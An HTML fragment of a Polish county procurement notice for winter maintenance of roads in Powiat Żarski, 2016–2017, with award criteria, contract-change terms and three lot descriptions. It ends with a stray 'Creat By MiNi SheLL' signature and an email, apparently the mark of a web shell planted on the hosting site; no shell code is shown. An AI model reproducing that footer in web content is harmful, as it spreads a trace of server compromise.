                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin zapłaty</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1.  Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w niżej wymienionych przypadkach:
1.1	ZMIANY OGÓLNE
      Możliwa jest:
a) zmiana adresu/siedziby Zamawiającego/Wykonawcy;
b) zmiana osób występujących po stronie Zamawiającego/Wykonawcy.

1.2	ZMIANY RZUTUJĄCE NA WYNAGRODZENIE
      Możliwa jest zmiana postanowień umowy:
       a) w związku ze zmianą stawki podatku od towarów i  usług(VAT).
              b) realizacją dodatkowych usług od dotychczasowego wykonawcy w przypadku wystąpienia 
             niekorzystnych warunków atmosferycznych, tj. ciągłych opadów śniegu, gołoledzi.
 
      
           2. Określa się następujący tryb dokonywania zmian postanowień umowy:
     2.1 Zmiana postanowień zawartej umowy może nastąpić wyłącznie, za zgodą obu stron     
     wyrażoną na piśmie, pod rygorem nieważności.
     2.2 Strona występująca o zmianę postanowień  zawartej umowy zobowiązana jest do    
    udokumentowania zaistnienia powyższych okoliczności.
    2.3 Wniosek o zmianę postanowień zawartej umowy musi być wyrażony na piśmie.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 12/10/2016, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Zimowe utrzymanie dróg powiatowych w południowej  części Powiatu Żarskiego,  na terenie gminy: Żary, Miasta Żary.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	Utrzymywanie ciągłej przejezdności dróg i ulic poprzez odśnieżanie całej sieci dróg objętych umową.
2.Zwalczanie śliskości pośniegowej i gołoledzi poprzez posypywanie całej sieci dróg objętych 
      umową.
3.	Oczyszczanie podczas roztopów wpustów ulicznych z błota i śniegu
4. Zamiatanie ulic min.dwa razy w miesiącu (usługa w ramach dyżurów), gdy przerwa w robotach ZUD wynosi 14 dni.
5.Oczyszczenie wpustów ulicznych oraz usunięcie piasku pozostałego po akcji zimowej, w terminie 
     do 10 kwietnia 2017 r.
6.Zapewnienie materiałów służących do skutecznego zwalczania śliskości pośniegowej i gołoledzi.
7.	Całodobowe pełnienie dyżurów z gotowością sprzętu i transportu oraz natychmiastowe 
      rozpoczynanie robót po wystąpieniu warunków zimowych opisanych w specyfikacjach: 
       ODŚNIEŻANIE   DROGI  oraz ZAPOBIEGANIE POWSTAWANIU I LIKWIDACJA 
       ŚLISKOŚCI ZIMOWEJ
8.	Prowadzenie ewidencji dziennej wykonywanych robót, rejestrowanie istotnych zdarzeń oraz opis stanu  i przejezdności dróg.
9.	Do każdej faktury należy dołączyć potwierdzony wykaz, zawierający: 
- datę świadczenia usługi,
- numery rejestracyjne pojazdów pracujących przy ZUD,
- godzinę wyjazdu, rodzaj usługi, numery dróg, na których pojazd świadczył usługę oraz godzinę  
  doprowadzenia stanu drogi do warunków określonych w specyfikacjach,
- wydruk z systemu GPS
10.Ponoszenie odpowiedzialności i pokrywanie w pełnej wysokości za szkody wynikające z 
       nienależytego wykonania robót.
11.Zapewnienie stałej łączności oraz przekazywanie do Starostwa Powiatowego w Żarach 
        rzetelnych informacji na temat przejezdności dróg.
12.Baza sprzętowa do prowadzenia robót ZUD powinna mieścić się na terenie objętym tymi robotami  tj. na terenie Powiatu Żarskiego. Oddalenie bazy od strefy obsługiwanej sprzętem do ZUD o każde  10 km, musi być rekompensowane skierowaniem do pracy, bez dodatkowego wynagrodzenia, dodatkowych jednostek będących własnością Wykonawcy. Przy odległości większej niż 10 km obowiązuje wielokrotność podstawionych do realizacji zadania jednostek sprzętowych, będących własnością  Wykonawcy. 
13.Pozostawanie w całodobowej gotowości sprzętu i pracowników w okresie, gdy w danym dniu,                   
        w godzinach nocnych oraz rannych, nie zachodzi konieczność odśnieżania dróg lub likwidacji 
       gołoledzi. 
14.	Przy świadczeniu usług obowiązywać będą następujące terminy:
- gotowość sprzętu na dzień 01 listopada 2016r.,
- rozpoczęcie usługi  pracy sprzętu na wezwanie zamawiającego nie później niż w ciągu dwóch godzin od wezwania,
- w przypadku braku pracy sprzętu, wyznacza się datę rozpoczęcia dyżurów na dzień 15 listopada 2016 roku.
- zakończenie usługi poda zamawiający z jednodniowym wyprzedzeniem.

15.	Wykaz dróg miejskich i zamiejskich  ich długości z podziałem na standardy zimowego utrzymania dla poszczególnych części zamówienia, mapa powiatu żarskiego do akcji zimowej oraz specyfikacje techniczne  określone są w załącznikach do niniejszej specyfikacji. 
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9, 90630000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/03/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin zapłaty</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Zimowe utrzymanie dróg powiatowych w południowej  części Powiatu Żarskiego,  na terenie gminy: Żary, Lipinki Łużycki, Trzebiel, Tuplice.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	Utrzymywanie ciągłej przejezdności dróg i ulic poprzez odśnieżanie całej sieci dróg objętych umową.
2.Zwalczanie śliskości pośniegowej i gołoledzi poprzez posypywanie całej sieci dróg objętych 
      umową.
3.	Oczyszczanie podczas roztopów wpustów ulicznych z błota i śniegu
4. Zamiatanie ulic min.dwa razy w miesiącu (usługa w ramach dyżurów), gdy przerwa w robotach ZUD wynosi 14 dni.
5.Oczyszczenie wpustów ulicznych oraz usunięcie piasku pozostałego po akcji zimowej, w terminie 
     do 10 kwietnia 2017 r.
6.Zapewnienie materiałów służących do skutecznego zwalczania śliskości pośniegowej i gołoledzi.
7.	Całodobowe pełnienie dyżurów z gotowością sprzętu i transportu oraz natychmiastowe 
      rozpoczynanie robót po wystąpieniu warunków zimowych opisanych w specyfikacjach: 
       ODŚNIEŻANIE   DROGI  oraz ZAPOBIEGANIE POWSTAWANIU I LIKWIDACJA 
       ŚLISKOŚCI ZIMOWEJ
8.	Prowadzenie ewidencji dziennej wykonywanych robót, rejestrowanie istotnych zdarzeń oraz opis stanu  i przejezdności dróg.
9.	Do każdej faktury należy dołączyć potwierdzony wykaz, zawierający: 
- datę świadczenia usługi,
- numery rejestracyjne pojazdów pracujących przy ZUD,
- godzinę wyjazdu, rodzaj usługi, numery dróg, na których pojazd świadczył usługę oraz godzinę  
  doprowadzenia stanu drogi do warunków określonych w specyfikacjach,
- wydruk z systemu GPS
10.Ponoszenie odpowiedzialności i pokrywanie w pełnej wysokości za szkody wynikające z 
       nienależytego wykonania robót.
11.Zapewnienie stałej łączności oraz przekazywanie do Starostwa Powiatowego w Żarach 
        rzetelnych informacji na temat przejezdności dróg.
12.Baza sprzętowa do prowadzenia robót ZUD powinna mieścić się na terenie objętym tymi robotami  tj. na terenie Powiatu Żarskiego. Oddalenie bazy od strefy obsługiwanej sprzętem do ZUD o każde  10 km, musi być rekompensowane skierowaniem do pracy, bez dodatkowego wynagrodzenia, dodatkowych jednostek będących własnością Wykonawcy. Przy odległości większej niż 10 km obowiązuje wielokrotność podstawionych do realizacji zadania jednostek sprzętowych, będących własnością  Wykonawcy. 
13.Pozostawanie w całodobowej gotowości sprzętu i pracowników w okresie, gdy w danym dniu,                   
        w godzinach nocnych oraz rannych, nie zachodzi konieczność odśnieżania dróg lub likwidacji 
       gołoledzi. 
14.	Przy świadczeniu usług obowiązywać będą następujące terminy:
- gotowość sprzętu na dzień 01 listopada 2016r.,
- rozpoczęcie usługi  pracy sprzętu na wezwanie zamawiającego nie później niż w ciągu dwóch godzin od wezwania,
- w przypadku braku pracy sprzętu, wyznacza się datę rozpoczęcia dyżurów na dzień 15 listopada 2016 roku.
- zakończenie usługi poda zamawiający z jednodniowym wyprzedzeniem.

15.	Wykaz dróg miejskich i zamiejskich  ich długości z podziałem na standardy zimowego utrzymania dla poszczególnych części zamówienia, mapa powiatu żarskiego do akcji zimowej oraz specyfikacje techniczne  określone są w załącznikach do niniejszej specyfikacji. 
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9, 90630000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/03/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin zapłaty</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Zimowe utrzymanie dróg powiatowych w północnej części Powiatu Żarskiego na terenie  Miasta i Gminy Lubsko, Miasta i Gminy Jasień, Gminy Brody, i Gminy Tuplice<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	Utrzymywanie ciągłej przejezdności dróg i ulic poprzez odśnieżanie całej sieci dróg objętych umową.
2.Zwalczanie śliskości pośniegowej i gołoledzi poprzez posypywanie całej sieci dróg objętych 
      umową.
3.	Oczyszczanie podczas roztopów wpustów ulicznych z błota i śniegu
4. Zamiatanie ulic min.dwa razy w miesiącu (usługa w ramach dyżurów), gdy przerwa w robotach ZUD wynosi 14 dni.
5.Oczyszczenie wpustów ulicznych oraz usunięcie piasku pozostałego po akcji zimowej, w terminie 
     do 10 kwietnia 2017 r.
6.Zapewnienie materiałów służących do skutecznego zwalczania śliskości pośniegowej i gołoledzi.
7.	Całodobowe pełnienie dyżurów z gotowością sprzętu i transportu oraz natychmiastowe 
      rozpoczynanie robót po wystąpieniu warunków zimowych opisanych w specyfikacjach: 
       ODŚNIEŻANIE   DROGI  oraz ZAPOBIEGANIE POWSTAWANIU I LIKWIDACJA 
       ŚLISKOŚCI ZIMOWEJ
8.	Prowadzenie ewidencji dziennej wykonywanych robót, rejestrowanie istotnych zdarzeń oraz opis stanu  i przejezdności dróg.
9.	Do każdej faktury należy dołączyć potwierdzony wykaz, zawierający: 
- datę świadczenia usługi,
- numery rejestracyjne pojazdów pracujących przy ZUD,
- godzinę wyjazdu, rodzaj usługi, numery dróg, na których pojazd świadczył usługę oraz godzinę  
  doprowadzenia stanu drogi do warunków określonych w specyfikacjach,
- wydruk z systemu GPS
10.Ponoszenie odpowiedzialności i pokrywanie w pełnej wysokości za szkody wynikające z 
       nienależytego wykonania robót.
11.Zapewnienie stałej łączności oraz przekazywanie do Starostwa Powiatowego w Żarach 
        rzetelnych informacji na temat przejezdności dróg.
12.Baza sprzętowa do prowadzenia robót ZUD powinna mieścić się na terenie objętym tymi robotami  tj. na terenie Powiatu Żarskiego. Oddalenie bazy od strefy obsługiwanej sprzętem do ZUD o każde  10 km, musi być rekompensowane skierowaniem do pracy, bez dodatkowego wynagrodzenia, dodatkowych jednostek będących własnością Wykonawcy. Przy odległości większej niż 10 km obowiązuje wielokrotność podstawionych do realizacji zadania jednostek sprzętowych, będących własnością  Wykonawcy. 
13.Pozostawanie w całodobowej gotowości sprzętu i pracowników w okresie, gdy w danym dniu,                   
        w godzinach nocnych oraz rannych, nie zachodzi konieczność odśnieżania dróg lub likwidacji 
       gołoledzi. 
14.	Przy świadczeniu usług obowiązywać będą następujące terminy:
- gotowość sprzętu na dzień 01 listopada 2016r.,
- rozpoczęcie usługi  pracy sprzętu na wezwanie zamawiającego nie później niż w ciągu dwóch godzin od wezwania,
- w przypadku braku pracy sprzętu, wyznacza się datę rozpoczęcia dyżurów na dzień 15 listopada 2016 roku.
- zakończenie usługi poda zamawiający z jednodniowym wyprzedzeniem.

15.	Wykaz dróg miejskich i zamiejskich  ich długości z podziałem na standardy zimowego utrzymania dla poszczególnych części zamówienia, mapa powiatu żarskiego do akcji zimowej oraz specyfikacje techniczne  określone są w załącznikach do niniejszej specyfikacji. 
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9, 90630000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/03/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin zapłaty</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com